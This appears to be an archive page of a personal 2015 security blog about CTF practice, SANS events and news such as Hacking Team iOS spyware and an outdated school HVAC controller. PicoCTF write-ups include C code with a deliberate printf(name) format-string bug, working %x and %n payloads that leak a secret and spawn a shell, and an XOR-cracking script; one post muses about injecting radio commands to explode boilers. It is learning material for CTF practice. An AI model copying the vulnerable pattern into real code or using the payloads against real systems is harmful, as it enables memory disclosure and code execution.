I'm currently trying to work on a couple of challenges.  I can't say much about the Flare-On Challenge.  I just found out about it Monday evening.  It is only ongoing until September 1st.  I don't really have a lot of experience with digital forensics, but I decided I would give it a try.  I will be happy if I solve one puzzle.  If interested, you may want to check out http://www.flare-on.com.  Be careful, though, because it is noted on the site that some parts of the challenge may be malicious.  The reason being that when doing digital forensics, one has to analyze malware.  I use VMs on a computer that I do not use for any activity other than challenges.  That way, even if malware breaks out of the VM, which some advanced ones can, I can just start from scratch.

The SANS Cyber Defense Challenge seems more straightforward so far.  You just answer a series of questions that you receive via e-mail.  There are ways to get more points as well, like being socially active about SANS Cyber Defense, and sharing good information regarding the field.  It'll probably get more difficult as it goes on.  I don't have a lot of experience in that either.  So, even if I don't win, I'll consider it a decent learning experience.  That challenge can be found at http://cyber-defense.sans.org/blog/2015/06/11/cyber-defense-challenge-leaderboard-2015.

I found a good Intro to Assembly tutorial at http://chortle.ccsu.edu/AssemblyTutorial/index.html.  I'm staring at a lot of assembly code trying the Flare-On Challenge, and I have no idea how to make heads or tails of it as of yet.  I downloaded IDA Free version, CFF Explorer, PE Explorer, Ollydbg, and ILSpy.  I installed them on a VM.  So far they seem fairly easy to use.  All of them except for ILSpy work okay using Wine.  ILSpy requires Microsoft .NET Framework 4.0.  I'm not sure if that will run on Wine or not.  I'll have to do more research on that, or start up a Windows VM and put it on there.  For the IDA Free version, I found some scripts that add functionality to it.  I was reading articles on resources.infosecinstitute.com called, "Applied Cracking & Byte Patching with IDA Pro" and "Applied Reverse Engineering with IDA Pro" that explained a little bit about how to use those scripts.  I want to find some more in-depth information about those scripts.  So I'll be looking more into that as well.

Thursday, July 23, 2015

Hacking Team iOS Malware

I've seen quite a few tweets about the Hacking Team iOS malware.  Specifically, I was reading this blog today:  https://blog.lookout.com/blog/2015/07/10/hacking-team/

It's interesting, because months ago I was wondering if iPhones could be targeted from apps/programs installed on the computer, and vice versa.  One could create malware that infects one via the other.  The reason that I thought this was because I was reading an article about USB devices being trusted completely by a computer.  If you really get down to it, isn't that what a mobile device is?  A storage device with a little more capability?

The blog states this:

"It appears there are three ways Hacking Team could get its spyware onto iOS devices:
An OS X app sideloads an iOS app automatically to a device when it’s plugged in via USB. This also appears to be bundled with a jailbreak exploit that may work on older versions of iOS.
There is a Windows desktop app that appears to do the same.
By clicking on a link to download from a website, email, etc. on the mobile device"

Phones and other mobile devices are an excellent avenue of attack.  How many of us are running some sort of security suite on our mobile devices?  Hardly anyone.  What kinds of things do many of us do on our mobile devices?  Banking, buying things, checking our healthcare status, etc.

Fortunately, according to the blog, this attack appears to require physical access.  However, they also state:

"With this specific attack, we believe physical access to the device was required, but Hacking Team’s possession of an enterprise certificate means that there’s the potential for other flavors of this attack that could be delivered via a web browser (drive by download), phishing email or other remote means."

The blog also states that iOS keeps the third-party keyboard from running in password fields, but in many cases passwords aren't that difficult to figure out once one has the user name, since the tool can grab e-mails.  Sometimes, the passwords are in the password reset notifications.

"It’s important to note that Apple does have some safeguards built into its third party keyboard support, which does not allow the keyboard to run in a field that is marked as a password field, so this tool won’t be able to steal passwords from properly implemented apps and websites, but it can be used to steal usernames, contents of emails, and other sensitive data."

I fear that, if it hasn't been done already, malware creators will find a way to make these exploits persistent.  What I mean by persistence is making sure that once it's on the phone, it stays there, regardless of user intervention.  I'm not well-versed in how these work, but couldn't one simply uninstall the malware from the device in this particular case?  I guess that if they have the app/program on the computer, it could just re-install itself.  Users could get rid of the app or program on the computer, though, and then it shouldn't be a problem.

The blog has decent advice about mobile security best practices.

"And, here are some general tips for staying safe:
Keep a passcode on your phone. A lot of spyware sold on the market requires that the attacker have physical access to the target device to install the software. Putting a passcode on your phone makes it that much harder for them.
Don’t download apps from third party marketplaces or links online. Spyware is also distributed through these means. Only download from official and vetted marketplaces such as the Apple App Store and Google Play. 
Don’t jailbreak your device unless you really know what you’re doing. Because jailbroken iOS devices are inherently less protected, they are more vulnerable to attack when security protection measures aren’t properly enabled.
Download a security app that can stop attacks before they do harm. Lookout does this, but if you’re not a Lookout user, ask your security provider if they detect Hacking Team and other forms of spyware."

I would also like to note that if your phone has a fingerprint reader, you should set a long PIN and use the fingerprint reader for ease of logging in.  The smudges on the phone make it easy to see what the numbers are, and people can see you entering the PIN.  If you're using a 4-digit PIN, those PINs are fairly trivial to guess if you know the numbers that are being used.

Tuesday, July 21, 2015

Insecure Control Systems

My spouse sent me an article today:  http://www.dailydot.com/technology/commadore-amiga-computer-school-air-conditioning/.  I read the article, and it scares me.  The article states that an old Commodore Amiga machine controls the heat and air conditioning of the district's schools.  This is one of the most fearsome sections in the article:

"It's one of those features, the 1200-bit modem and a wireless radio signal, that makes it possible for the ancient hardware to communicate with the district's schools.  Though the radio signal allows the Amiga to get status checks, toggle boilers, fans, and the like in a matter of seconds, it also communicates at the same frequency as the walkie-talkies used by the maintenance department. This creates occasional interference and requires the maintenance crew to shut off their radios for up to 15 minutes at a time."

I noted that the old machine needs to be replaced.  Some people would say, "Why get rid of something that works?" 

Here is why:  My spouse and I were conversing, and he mentioned that the Amiga is transmitting a wireless frequency.  Since this machine was made in the 80's, the wireless signal may not be encrypted.  Anyone with a wireless sniffer, like aircrack-ng, could sniff this traffic, and potentially inject commands, which means that they could control the heat and air-conditioning.  When they have control over the heat and air-conditioning, they could cause the boilers in the schools to explode by changing the settings.

People wonder why someone would target a school.  There are a few reasons that I can think of.  I'm sure that there are more.  One) A disgruntled employee with technical knowledge wants to get revenge because they are not getting the pay that they would like, or they've been fired.  Two) A disgruntled student isn't happy with being in school for some reason: bullying, no one is dating them, they're mentally unstable, etc.  Three) A terrorist, who can have one of many reasons to do such a thing.

There was money set aside to pay for replacing the machine.  The school opted to take care of other projects instead.  I can't say that I blame them with the information that they have, replacing the boilers and roofs, and removing asbestos was important at the time.

"It was expected the outdated system would be replaced in 2011 when voters passed a "Warm Safe and Dry" bond to release money to the district schools for upkeep and maintenance purposes. Because the computer was still functioning just fine, it didn't make the list of projects. Instead, the money was spent replacing boilers and roofs and removing asbestos."

So, it wasn't a matter of not having enough money in the budget, this just wasn't a priority.  There needs to be more awareness raised about the dangers of unsecured control systems.  Even if they don't think that they are a target, they could be.

At least they mention planning on replacing it now... if a $175 million bond for school spending is passed.

"A new system will cost up to $2 million, and will be installed if voters pass a $175 million bond for school spending."

Last, if this school has an ancient machine running their control systems, it makes me worry about what other control systems are being controlled by ancient machines and how secure they are.

Monday, July 20, 2015

Picoctf 2014 Snapcat :)

Snapcat

We were given a corrupted disk image.  We were supposed to get information off of it.  I looked at the disk image using a hex editor, and noticed that it had pictures on it.  I saw jpeg headers.  So, I used a program called Foremost on my SIFT VM to carve the images out of the disk.img file.

$ foremost -t jpg -o ~/Desktop -c etc/foremost.conf disk.img

-t: specifies what type of file that I want to be carved out.
-o: specifies the directory where I want the output file
-c: specifies where the foremost config file is
disk.img is the name of the img that I was carving files out of.

One of the pictures that was output had this flag.

i_can_has_cheezburger
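To show what foremost is doing with -t jpg, here is an added example (my own code, not foremost's and not the challenge's disk.img) that carves JPEGs out of a raw image by scanning for the SOI header bytes and the EOI footer bytes, with a constructed "disk image" built inline; write_carved and its output directory are my own helper, not a foremost feature.

```python
"""Header/footer JPEG carving, the technique behind foremost -t jpg.

Added example: not foremost's code and not the picoCTF disk image. The
"disk" below is a constructed byte string with two tiny fake JPEGs in it.
"""
from pathlib import Path

# A JPEG starts with the SOI marker FF D8 followed by another FF (the first
# segment marker) and ends with the EOI marker FF D9.
JPEG_HEADER = b"\xff\xd8\xff"
JPEG_FOOTER = b"\xff\xd9"


def carve_jpegs(image: bytes, max_size: int = 20 * 1024 * 1024) -> list:
    """Return [(offset, data), ...] for every JPEG found by raw byte scanning.

    The filesystem is ignored entirely, which is why carving still works on
    a corrupted image: only the file contents themselves need to survive.
    Caveat: an Exif thumbnail carries its own FF D9, so a naive scan like
    this can cut a real photo short; foremost's config tunes for that.
    """
    found = []
    pos = 0
    while True:
        start = image.find(JPEG_HEADER, pos)
        if start == -1:
            break
        # Look for the footer within max_size bytes of the header.
        end = image.find(JPEG_FOOTER, start + len(JPEG_HEADER), start + max_size)
        if end == -1:
            pos = start + 1          # orphan header: skip it, keep scanning
            continue
        end += len(JPEG_FOOTER)
        found.append((start, image[start:end]))
        pos = end
    return found


def write_carved(found, outdir: str) -> list:
    """Write each carved file as <offset>.jpg into outdir (helper of mine)."""
    out = Path(outdir)
    out.mkdir(parents=True, exist_ok=True)
    names = []
    for offset, data in found:
        name = out / f"{offset:08d}.jpg"
        name.write_bytes(data)
        names.append(str(name))
    return names


def build_fake_image() -> bytes:
    """Constructed 'disk image': junk, a JFIF-style file, junk, an Exif-style file."""
    jpeg1 = JPEG_HEADER + b"\xe0\x00\x10JFIF" + b"\x00" * 20 + JPEG_FOOTER
    jpeg2 = JPEG_HEADER + b"\xe1\x00\x16Exif" + b"\x11" * 40 + JPEG_FOOTER
    return b"\x00" * 512 + jpeg1 + b"junkdata" * 8 + jpeg2 + b"\xff" * 100


if __name__ == "__main__":
    for offset, data in carve_jpegs(build_fake_image()):
        print(f"JPEG at offset {offset}, {len(data)} bytes")
```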

Being Ethical

I post about pen-testing and digital forensics challenges that I do.  I think that that can give the wrong impression of the kind of person that I am. 

I don't like "hacking" in the derogatory sense.  It is morally wrong when you harm other people or cause their machines to malfunction.  Someone stole my identity when I was younger, and I remember all of the hoops that I had to jump through to put my life back together.  I don't wish that kind of harm on another person.

It's also unethical.  I analyze risk.  If someone is caught doing something wrong, it makes them untrustworthy.  That means that they could be blacklisted from getting hired anywhere.  I don't think that hacking someone without permission is worth that risk. 

I like doing the challenges because they are like puzzles to be solved.  Nothing more than that.  I've always liked solving puzzles.  Right now, it's a hobby that I enjoy. 

Some day, I hope to get into the field.  I'm not sure exactly which area yet.  There are many areas in the field of computer security.  Right now, I'm just learning a little bit of everything that I can.  Pen-testing and defense, for instance, are two sides of the same coin, according to Ed Skoudis.  How can you defend a network if you don't know the avenues that are available to exploit it?  So, even though I'm learning some pen-testing, it could be relevant to defense and vice versa.

Friday, July 17, 2015

What Did I Learn From My First Live Cyber Challenge

I’m writing this post in hopes that it helps people who are afraid to try these cyber challenges because they think that they don’t know enough.

I got into this challenge, not necessarily because of my knowledge, but because of my ability to find answers when I need them.  I could read a little code, I could understand a little bit about what was going on, but I can’t write code very well anymore.  It’s been 9 years since I graduated college.  As anyone knows, in tech time, that’s a long time.  There are version changes and new languages being made.  Sure, the basic things that I had learned still apply, but it’s not exactly the same.  I’ve been out of the workforce for nearly that long as well.  So if you’re in that same boat, don’t let it discourage you.

You’d be surprised how much progress in learning I’ve made since I started doing these online cyber challenges and this live challenge, just by giving them a shot.  My first attempts weren’t very elegant.  So just try them, you might surprise yourself.

Once you make it to a camp:

Listen to the instructors.  This seems obvious, but sometimes we get distracted by minor glitches, like having connectivity issues, or taking notes, so we don’t pay attention to their message. 

Take advice from other students and the TA’s.  Another student who was more experienced than I told me to not worry so much and to open notepad or bring a notebook, and make notes of page numbers of important info as we go along.  He’s absolutely correct.  Indexing is a great idea.

Use every avenue within legal means.  I tried a little social engineering and recon before the challenge.  I'm going to put a disclaimer on this.  This does not mean send a phishing e-mail to your instructor and attempt to own their machine.  This means, ask them what they've been reading.  Ask them what projects they've been working on, ask them what ctf's that they've done before.  Here is why.  People are busy.  Many times, they will reuse material from things that they are working on, reading, or doing.  Sometimes, they even reuse the same challenges.  If you've read my previous blog posts, Shmoocon, and the SANS 2014 Brochure challenge were pretty much the same with minor changes.  Yes, the target may say, “No, I can’t help you,” but it never hurts to ask in a respectful manner.  You never know, they may go for it because that is part of the lesson that they are trying to teach you.  Know human behavior.  If they aren't willing to answer, read their blogs.  You can usually find those things on their blogs.

DO NOT SKIMP on RECON and SCANNING. People quickly dismiss this part of the process without realizing that the creators of the challenge will make the contest much like the real world.  People in the real world make mistakes.  If you focus on the exploits, you’ll never see the easy solutions sitting right in front of you.  Sure, it feels awesome to pop that first shell, but in the real world, we are on a time-limit, we have a scope of what we are allowed to do, and we can’t afford to chase down exploits that could easily be accomplished in other ways like finding a plain text password from a search of user logs that takes about five seconds.  During my research last night, I uncovered this blog:

https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

Notice that many of the privilege “exploits” are actually just social engineering, in other words, knowing human behavior.

I also looked up one of the hostnames because people commonly name their machine whatever OS they are running, and/or the version number.  I didn’t understand the significance of it until today.  I wasn’t entirely wrong.  I just didn’t think that I had all the info that I needed.

I looked up the other OS versions, as well, looking for vulnerabilities for those particular OS's.  If you have notes, for heaven’s sake, share them.  I was so nervous today, that I forgot to share my research.  I spent a long time last night doing research, and that effort wasn’t exactly wasted, because I learned, but it could’ve been more useful. 

Don’t expect metasploit to find everything for you.  You can help narrow down results the night before.  I suggest not waiting until the last night to study and research.

Know your tools.  There were a couple of questions I'm sure that we could have found the answer to if we knew how to use the tools.  We were okay with the tools we learned in class, but lacked skills in other useful tools.

When you find out who your teammates are, make a plan of attack.  Find out what each other's strengths and weaknesses are, and play to your strengths.  I suggest having each person take one section of what you have learned and research it extensively.

On the Challenge Day, listen to what the instructors and challenge creators say.  I know, you want to dig right in, but sometimes they give hints on challenge days that you may miss if you’re trying to attack.  Their first advice, go for the low hanging fruit.  Don’t spend hours going into the machine and trying to do the exploits because you might end up losing a lot of points if you’re chasing a tangent that may or may not be the correct solution.

The ctfs (any of them, so I'm not giving anything specific away) have different sections.  Pick a section that you are good at and go for it.  That being said, plan with your teammates on who does what, accordingly.  You do not want to waste time answering the same questions.  It only counts for points one time.

Google your heart out.  You may find the answer that way.

Don’t give up.  Keep trying until that last call.  You may learn something in the process.

Cyber Camp CTF

I survived this week and the ctf.  I'm not allowed to give out any answers for this until the other challenges have been done.  I was fortunate to be assigned to a team of brilliant people.  We ended up in 3rd place.  We were all first year Cyber Camp CTF Competitors, meaning that this was our first time attending this event.  Other teams had the advantage because it was their second+ year.  Thanks for doing such an excellent job, guys!  Thanks to the creators for such a great ctf.  Thanks to the instructors and everyone who took time out of their jobs to run the event.

I was a little disappointed with myself.  The guys knew a bit more Linux than I did, so I stayed off of the boxes and manned the scoreboard, trying to get little 5, 10, and 15 point questions.  Some of the guys didn't have the online challenge experience that I had, though, so I should've at least checked out the file systems because even though I might not know that much, I may know that one thing from other challenges that I have done that would answer higher point questions.  My reasoning for staying off the machines:  We had a limited amount of resources, so I didn't want to slow down their attempts to scan or attack.  There are also a couple of questions that I knew the answer to, but didn't trust myself to answer properly, so I wasted time googling, even though I knew the answer.  Alex Rams told me to believe in myself.  I should've taken his advice.  I'm still happy with the result, but unhappy that I didn't challenge myself this time around.  I had to think of what was best for the team though, and sometimes, what's best is to be the research person.

I think that this challenge was well worth the investment that my family made in it.  I have new resources to hone my skills.  I met a lot of interesting people.

Tuesday, July 14, 2015

Cyber Camp-Day 2

Today was a decent day.  I had a connectivity issue with a couple of my VMs because I had to use a bridged connection in VMware Fusion.  I'm using a Mac.  That was a headache.  Fortunately someone helped me figure it out.  Thanks, person who I-don't-know-if-you-want-a-shout-out-or-not.  Also, thanks to the other person who helped me change the config files yesterday to get communication between my VMs working.  That course, yesterday, was made for Windows hosts.

I thought that I would post for future me or anyone else who may find it useful.

In order for the bridged connection to work for my VM's, I had to go to Virtual Machine Settings>Network Adapter>Wi-Fi>Adapter>System Preferences>Advanced Button>Set Elevator Box to "Manually">Type in an IP Address in the same range as my VM's Network IP's>Type in the same subnet mask as my VM's>Make sure that the Wi-Fi is connected to a Wireless Access Point and is on

Then I followed the directions in my lab to set the IP's and subnet masks of the VM's.

Note:  It does not have to be a Wi-Fi adapter.  Later I configured a wired adapter in the same manner.  The key is to make sure that whatever medium you are using is plugged in to a working port on a network switch, or that the Wi-Fi is connected to a wireless access point.  Also, make sure that your VM firewalls and host firewall are not getting in the way of communication.

After that the course went fairly smoothly with the exception of one minor glitch that was not my fault.  One lab went pear shaped when we couldn't connect to the machines that we were supposed to.  They got it up and running fairly quickly.

These courses seem to be previews for SANS courses.  It's nice that we are doing different courses each day, but there is some material that I wish we had time to study more in depth.

Monday, July 13, 2015

Cyber Camp-Day 1

Today was an interesting day.
1). Never rely on public transport.  Being stuck in an unfamiliar area, in the pouring down rain is not my idea of a good time.

2). Don't buy a computer with an unfamiliar OS right before a class.  I was tempted by the shiny specs.  I ended up okay, but it made me a bit nervous.

3). Make sure that you come prepared.  Our class material was distributed on CDs.  Fortunately, I packed an external DVD drive, patch cable, and an Ethernet adapter.  I did not have something to decompress a 7z file on my host OS.  I had to open my SIFT VM, decompress the file, and move it to the host machine.  It took longer than necessary.

I'm not exactly sure what I'm allowed to discuss about the class.  I will say that it was extensive.  I'm not sure how much will sink in.  It was well worth doing Cyber Quest.  They were not kidding when they said that the instructors are top notch.

Wednesday, June 24, 2015

Picoctf 2014 Repeating XOR

I wasn't exactly sure how to approach this one, given that I don't have a lot of experience with XORing.  I think that I understand the basic idea of it:  hex plaintext XOR hex key = hex encoded data.  If you know the hex plaintext, and you have the hex encoded version of that same plaintext, then you should get the hex key by XORing the plaintext with the encoded data.  Then you can use that key to break the rest of the encoding.  This is kind of what Alan Turing did to break the Enigma cipher.  He used plaintext and the encrypted text of that plaintext to find the key.

I was reading about Hamming distance.  From what I understand, the key length can be guessed fairly accurately by comparing chunks of the ciphertext: chunks that were XORed with the same key bytes have a smaller Hamming distance than chunks that weren't.  So, if the chunks 10 characters apart are the most similar, then the key length is probably 10.  I need to do further reading about this and experiment with it to see if I can better understand it.
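As an added example (my own code, not xortool's, and not the challenge's ciphertext), the following script carries both ideas through on a constructed plaintext and a constructed 10-byte key: it scores candidate key lengths by Hamming distance, handles the "key-length can be 5*n" ambiguity by taking the smallest divisor that scores as well, and then recovers each key byte by brute force with an English-likeness score rather than xortool's most-frequent-character assumption.

```python
"""Repeating-key XOR: guess the key length with Hamming distance, then
recover the key one column at a time.

Added example: not xortool's code and not the challenge data. The
plaintext and the 10-byte key are constructed here so it runs offline.
"""
SAMPLE_KEY = b"\xa7\xd2\x13\xe0\x73\x08\x49\xc9\x9e\x31"   # constructed, 10 bytes
SAMPLE_PLAINTEXT = (   # constructed "history of cryptography" style text
    b"The history of cryptography begins with simple substitution ciphers, "
    b"where each letter of the message is replaced by another letter. "
    b"Frequency analysis, described by Arab scholars in the ninth century, "
    b"breaks such ciphers because the most common letters of the language "
    b"show through as the most common symbols of the ciphertext. "
    b"Polyalphabetic ciphers such as the Vigenere cipher hid this pattern "
    b"by changing the substitution from letter to letter, yet once the key "
    b"length is known each position can again be attacked on its own. "
    b"Repeating key xor has exactly the same weakness on modern computers, "
    b"which is why a one time pad must never reuse any part of its key."
)
COMMON_ENGLISH = set(b" etaoinshrdlu")   # most frequent bytes in English text


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data with the key repeated; encryption and decryption are the same."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def hamming(a: bytes, b: bytes) -> int:
    """Number of bit positions in which two equal-length byte strings differ."""
    return sum(bin(x ^ y).count("1") for x, y in zip(a, b))


def score_key_length(ct: bytes, length: int) -> float:
    """Mean Hamming distance per byte between adjacent ciphertext blocks.

    If `length` is the real key length (or a multiple of it), adjacent blocks
    were XORed with the same key bytes, so the key cancels out and the
    distance is that of plain English (low). Otherwise the mismatched key
    bytes add extra differing bits.
    """
    blocks = [ct[i:i + length] for i in range(0, len(ct) - length + 1, length)]
    if len(blocks) < 2:
        return float("inf")
    total = sum(hamming(x, y) for x, y in zip(blocks, blocks[1:]))
    return total / ((len(blocks) - 1) * length)


def guess_key_length(ct: bytes, max_len: int = 40, tolerance: float = 0.15) -> int:
    """Best-scoring length, then the smallest divisor of it that scores as well.

    Multiples of the true length score just as low (xortool's "key-length
    can be 5*n" message), so the smallest good divisor is the real length.
    """
    scores = {n: score_key_length(ct, n) for n in range(2, max_len + 1)}
    best = min(scores, key=scores.get)
    for n in sorted(scores):
        if best % n == 0 and scores[n] <= scores[best] * (1 + tolerance):
            return n
    return best


def english_score(buf: bytes) -> int:
    """Reward common English bytes, punish unprintable ones."""
    score = 0
    for b in buf:
        if b in COMMON_ENGLISH:
            score += 2
        elif not 32 <= b < 127:
            score -= 5
    return score


def recover_key(ct: bytes, length: int) -> bytes:
    """Each ct[i::length] column is a single-byte XOR; try all 256 bytes per column.

    xortool instead assumes the most frequent byte of each column is a space
    (its -c option); scoring every candidate is more robust on short input.
    """
    key = bytearray()
    for col in range(length):
        column = ct[col::length]
        best = max(range(256), key=lambda k: english_score(bytes(b ^ k for b in column)))
        key.append(best)
    return bytes(key)


if __name__ == "__main__":
    ct = xor_bytes(SAMPLE_PLAINTEXT, SAMPLE_KEY)
    n = guess_key_length(ct)
    key = recover_key(ct, n)
    print(f"guessed key length {n}, key {key!r}")
    print(xor_bytes(ct, key).decode()[:60])
```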

After searching Google for a while, I stumbled upon a tool called "XorTool" on GitHub.  I'm using VMs, so I downloaded, scanned, and installed it.  Then I set about learning how to use it.  I was given the hint that the key length may be 10.  I was also told that the plaintext was a "history of cryptography", so I had a good idea of what I was looking for.  I let the tool do the work for me.  I just typed xortool -x -l 10 encrypted.  -x told the program that the file was hex encoded, -l told the program that I was guessing a key length of 10, and encrypted was the name of the encrypted file.  It guessed that the most likely length was 10.  So then I ran the following command and got the following output.

$ xortool -x -o encrypted
The most probable key lengths:
   2:   9.7%
   5:   14.5%
   8:   7.2%
  10:   20.7%
  12:   6.0%
  15:   8.9%
  20:   12.8%
  25:   5.7%
  30:   8.5%
  40:   6.1%
Key-length can be 5*n
100 possible key(s) of length 10:
\x94\xd6\xb1\xc2\xbc\t\x05\xd6\x1c6
\x95\xd7\xb0\xc3\xbd\x08\x04\xd7\x1d7
\x96\xd4\xb3\xc0\xbe\x0b\x07\xd4\x1e4
\x97\xd5\xb2\xc1\xbf\n\x06\xd5\x1f5
\x90\xd2\xb5\xc6\xb8\r\x01\xd2\x182
...
Found 51 plaintexts with 95.0%+ printable characters
See files filename-key.csv, filename-char_used-perc_printable.csv

After this, I read filename-char_used-perc_printable.csv.  This gave me a decent idea of which keys were correct, because it told me the percentage of the characters in each potential key that were printable.  Xortool saves possible plain text files as out files.  I navigated to the folder that contains these out files.  I just used cat <numberIwasinterestedin>.out in my terminal, and it printed out the out file.  I only printed the texts with 100 percent printable characters.  There were only 7, so it made finding the correct decrypted file really easy.

$cat 94.out
your flag is: ab2614e35e828a602c50ebc9b0f5d710e2312388

On 17 March 1975, the proposed DES was published in the Federal Register. Public comments were requested, and in the following year two open workshops were held to discuss the proposed standard. There was some criticism from various parties, including from public-key cryptography pioneers Martin Hellman and Whitfield Diffie, citing a shortened key length and the mysterious "S-boxes" as evidence of improper interference from the NSA. The suspicion was that the algorithm had been covertly weakened by the intelligence agency so that they - but no-one else - could easily read encrypted messages. Alan Konheim (one of the designers of DES) commented, "We sent the S-boxes off to Washington. They came back and were all different." The United States Senate Select Committee on Intelligence reviewed the NSA's actions to determine whether there had been any improper involvement. In the unclassified summary of their findings, published in 1978, the Committee wrote:

    In the development of DES, NSA convinced IBM that a reduced key size was sufficient; indirectly assisted in the development of the S-box structures; and certified that the final DES algorithm was, to the best of their knowledge, free from any statistical or mathematical weakness.

However, it also found that

    NSA did not tamper with the design of the algorithm in any way. IBM invented and designed the algorithm, made all pertinent decisions regarding it, and concurred that the agreed upon key size was more than adequate for all commercial applications for which the DES was intended.

Another member of the DES team, Walter Tuchman, stated "We developed the DES algorithm entirely within IBM using IBMers. The NSA did not dictate a single wire!" In contrast, a declassified NSA book on cryptologic history states:

    In 1973 NBS solicited private industry for a data encryption standard (DES). The first offerings were disappointing, so NSA began working on its own algorithm. Then Howard Rosenblum, deputy director for research and engineering, discovered that Walter Tuchman of IBM was working on a modification to Lucifer for general use. NSA gave Tuchman a clearance and brought him in to work jointly with the Agency on his Lucifer modification."

and

    NSA worked closely with IBM to strengthen the algorithm against all except brute force attacks and to strengthen substitution tables, called S-boxes. Conversely, NSA tried to convince IBM to reduce the length of the key from 64 to 48 bits. Ultimately they compromised on a 56-bit key.

Some of the suspicions about hidden weaknesses in the S-boxes were allayed in 1990, with the independent discovery and open publication by Eli Biham and Adi Shamir of differential cryptanalysis, a general method for breaking block ciphers. The S-boxes of DES were much more resistant to the attack than if they had been chosen at random, strongly suggesting that IBM knew about the technique in the 1970s. This was indeed the case; in 1994, Don Coppersmith published some of the original design criteria for the S-boxes. According to Steven Levy, IBM Watson researchers discovered differential cryptanalytic attacks in 1974 and were asked by the NSA to keep the technique secret. Coppersmith explains IBM's secrecy decision by saying, "that was because [differential cryptanalysis] can be a very powerful tool, used against many schemes, and there was concern that such information in the public domain could adversely affect national security." Levy quotes Walter Tuchman: "[t]hey asked us to stamp all our documents confidential... We actually put a number on each one and locked them up in safes, because they were considered U.S. government classified. They said do it. So I did it". Bruce Schneier observed that "It took the academic community two decades to figure out that the NSA 'tweaks' actually improved the security of DES."

Picoctf 2014 Guess

On this problem, I had to guess a random 32-bit integer.  I had a 1 in 2^32 chance of getting it right, making it very unlikely that I would actually be able to guess the number.  I studied the source program, which was written in C, and noticed that the name read by "fgets(name, sizeof(name), stdin);" was later passed straight to printf, which is a format string vulnerability.  I noticed that the variable that I wanted, f, was the fourth integer on the stack.  So, when the program asked my name, I typed in %d.%d.%d.%d, and it printed four numbers that were separated by periods so that I could read them more easily.  When it asked me to type in my guess, I typed in the fourth number that had printed out, and got the flag:  leak_the_seakret.

#include <stdio.h>
#include <stdlib.h>

char *flag = "~~FLAG~~";

int main(void){
    int secret, guess;
    char name[32];
    long seed;   /* unused in the original; kept so the stack layout matches */
    (void)seed;

    /* the 32-bit secret comes straight from the kernel's random source */
    FILE *f = fopen("/dev/urandom", "rb");
    if(f == NULL || fread(&secret, sizeof(int), 1, f) != 1){
        perror("/dev/urandom");
        return 1;
    }
    fclose(f);

    printf("Hello! What is your name?\n");
    fgets(name, sizeof(name), stdin);

    printf("Welcome to the guessing game, ");
    /* user input used directly as the format string: this is the bug the
       challenge is about, so it is left as-is (the fix is printf("%s", name)) */
    printf(name);
    printf("\nI generated a random 32-bit number.\nYou have a 1 in 2^32 chance of guessing it. Good luck.\n");

    printf("What is your guess?\n");
    scanf("%d", &guess);

    if(guess == secret){
        printf("Wow! You guessed it!\n");
        printf("Your flag is: %s\n", flag);
    }else{
        printf("Hah! I knew you wouldn't get it.\n");
    }
    return 0;
}

$ nc vuln2014.picoctf.com 4546
\Hello! What is your name?
%d.%d.%d.%d
Welcome to the guessing game, \32.-143668192.162005000.-857849444

I generated a random 32-bit number.
You have a 1 in 2^32 chance of guessing it. Good luck.
What is your guess?
-857849444
Wow! You guessed it!
Your flag is: leak_the_seakret

Monday, June 22, 2015

Picoctf 2014 Format String

I just completed the format string problem.  I took a semester of C a long time ago, but I remembered enough to know what was going on in the program that I was given to exploit.  I used gdb -q ./format, then p &secret to find the location of the variable of secret in memory.  Then I ran the program:

./format $(python -c 'print "%x.%x.%x"')

%x prints values from the stack as hexadecimal.  I put a dot between them so that I could see where each ended.  I kept adding a %x. until I found the address that I needed.  I found out that the 7th value was the address that I needed.  It was 0x0804a030.  The hint said that %n would be useful.  I tried it, but I just couldn't get it to work correctly.  Then I found some nice articles that explained format string vulnerabilities fairly well.  They were:  http://codearcana.com/posts/2013/05/02/introduction-to-format-string-exploits.html, and https://crypto.stanford.edu/cs155/papers/formatstring-1.2.pdf.  So then I ran the program with ./format $(python -c 'print "%1337x%7$n"').  The %1337x pads an unsigned hexadecimal integer out to a width of 1337 characters, so 1337 bytes have been written by the time the next directive is reached.  The %7$n specifies that I want the 7th value on the stack, and n means that I want to write the number of bytes written so far to that place in memory.  I got a shell.  Then I typed "cat flag.txt" and got the flag, which was who_thought_%n_was_a_good_idea?

Wednesday, June 17, 2015

SANS@Night

My spouse was kind enough to request that I get a badge so that I could attend some SANS@night presentations.  I've only been to two, because there are many of them that my spouse would like to attend, and someone has to watch the kids.

The first one that I attended was a SANS WIT presentation.  Their hash tag is #SANS_WIT.  It was a networking event for women to meet other women in technology, and to learn about SANS programs that may help women.  I can't discuss specifically what was in the presentation, but suffice it to say, if you are a woman, interested in the IT field, you may want to attend one of these presentations.  I felt awkward.  I'm a stay at home mom listening to ladies say, "I'm the Chief Security Officer at ...". They asked what I did.  I feel like I probably sounded like a country bumpkin.  "I'm just a stay at home mom who has done a couple consulting/contract jobs from home, and I do pen-testing/digital forensics challenges for fun."  I told them that I was invited to an invite only cyber camp in my state.  It didn't help that I had recently lost some weight, so I was wearing pants and a shirt that was hanging off of me.  Those were my issues, though, not the other ladies.  They seemed like nice people.

The second one was Securing Your Kids.  Most of the information was common sense practices that most people would do, but there were some insightful ideas given by other parents, so it may be worth attending.  I was tempted to skip this one and attend more technical presentations.

Tuesday, June 16, 2015

Cyber Quest

I can't give the answers to Cyber Quest.  They may reuse the questions.  I did do Cyber Quest, though.  http://uscc.cyberquests.org.  This year's challenge focused on secure programming practices in some popular programming languages.  I did well enough that I have been invited to an invite-only cyber camp in my state.  I'm looking forward to it, but I'm slightly nervous.  It will be in an area that I'm not really familiar with.  I'm doing research about how to get around, and about the crime in the area.  I wish that I knew more people so that I could hitch a ride with someone and let them figure out the details.  I'm also nervous about how little I know compared to others.  My spouse, who is attending SANS Fire, quoted John Strand to try and convince me that things should be okay.  John Strand says that there will always be someone smarter than you are, but you shouldn't let that deter you from trying.

Tuesday, April 21, 2015

2015 Orlando Brochure Challenge Solution

SANS 2015 Orlando Brochure Challenge Solution

I had to wait until the deadline passed in order to submit my write up of this challenge.  The last entry date to be eligible for a prize was 4/20/2015.

